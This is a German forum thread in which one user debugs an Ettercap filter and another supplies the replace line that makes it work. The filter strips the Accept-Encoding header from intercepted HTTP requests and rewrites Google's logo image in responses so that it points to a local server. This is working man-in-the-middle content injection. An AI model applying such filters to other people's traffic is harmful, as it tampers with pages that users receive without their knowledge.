Ettercap Filter

Ikarus · Beitrag von **Ikarus** » 01.03.2008 11:25:31

Hallo,

ich hoffe das hier der riochtige thread für diese Frage ist.

Ich habe mich ein bisschen mit ettercap beschäftig und habe folgenden Filter erstellt.

Code: Alles auswählen

if (ip.proto == TCP && tcp.dst == 80) {

   if (search(DATA.data, "Accept-Encoding")) {

      replace("Accept-Encoding", "Accept-Rubbish!"); 

	  # note: replacement string is same length as original string

      msg("zapped Accept-Encoding!\n");

   }

}

if (ip.proto == TCP && tcp.src == 80) {
   replace("src=\"/intl/de_de/images/logo.gif\" ", "");

   msg("Filter Ran.\n");

}

auf der Website die ich ändern möchte sie das src so aus

Code: Alles auswählen

src="/intl/de_de/images/logo.gif"

Das ist das Google Logo.

Filter Ran wird in der Console angezeigt.
Jedoch wird nichts an den Packeten geändert.

Kann mir jemand weiter helfen .

Gruß
Iki

rolo · Beitrag von **rolo** » 01.03.2008 13:37:22

hi,

wenn du wirklich auf ein bild, welches auf deinem lokalen rechner liegt, verweisen willst, brauchst du dazu auch einen lokalen webserver.
die zeile funktioniert dann so

Code: Alles auswählen

replace("img src=", "img src=\"http://192.168.x.x/logo.gif\" ");

wobei du die netzwerk ip deines rechners einträgst, und das bild in das entsprechende verzeichnis deines z.b. apache servers schiebst.

viel spass damit

Ikarus · Beitrag von **Ikarus** » 03.03.2008 16:19:16

Danke, aber das ist mir so klar..

Mein eigentlichen Prob ist. Das er garnicht das Paket ersetzt..

Hiernochmal der Filter, den ich aktuell benutze

Code: Alles auswählen

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("src=\"/intl/de_de/images/logo.gif\" ", "src=\"192.168.178.11/image.jpg\" ");
   msg("Filter Ran.\n");
}

Jemand ne Idee an was es liegen könnte?

Grüße
IKi

rolo · Beitrag von **rolo** » 03.03.2008 20:32:12

die von mir gepostete zeile ersetzt alle bilder in html seiten die gefiltert werden, durch das eigene.
was willst du jetzt erreichen?

Ikarus · Beitrag von **Ikarus** » 04.03.2008 08:26:43

Hi,

ich habe das ja auch so in meinem Filter implementiert..

Ich versuche ausschließlich das Gooogle Logo zu ersetzten. Deswegen erstetze ich nur den Google logo image tag...

Code: Alles auswählen

 replace("src=\"/intl/de_de/images/logo.gif\" ", "src=\"192.168.178.11/image.jpg\" ");

iin die IF abfrage nach dem TCP Protokoll springt er auch...Soll heisen in der Console wird Filter Ran angezeigt.

Code: Alles auswählen

 msg("Filter Ran.\n");

Jedoch wird nie das Paket geändert bzw ersetzt..

Gruß
Constantin

rolo · Beitrag von **rolo** » 04.03.2008 17:26:42

hi,
guck dir mal den html quelltext der google seite, und das script genauer an. diese zeile funktioniert:

Code: Alles auswählen

replace("img alt="Google" height=110 src=", "img alt="Google" height=110 src=\"http://192.168.x.x/deinbild.jpeg\" ");

sie ersetzt das google logo innerhalb der startseite.
bis denn

Ikarus · Beitrag von **Ikarus** » 04.03.2008 21:32:22

DANK!!! Funktioniert wunderbar..

Gibt es eine bestimmte Regel, wie ich replace benutzen muss..? Würde gerne wissen warum mein Replace nicht funktioniert hat..?

Danke nochmal ...
Gru0

Iki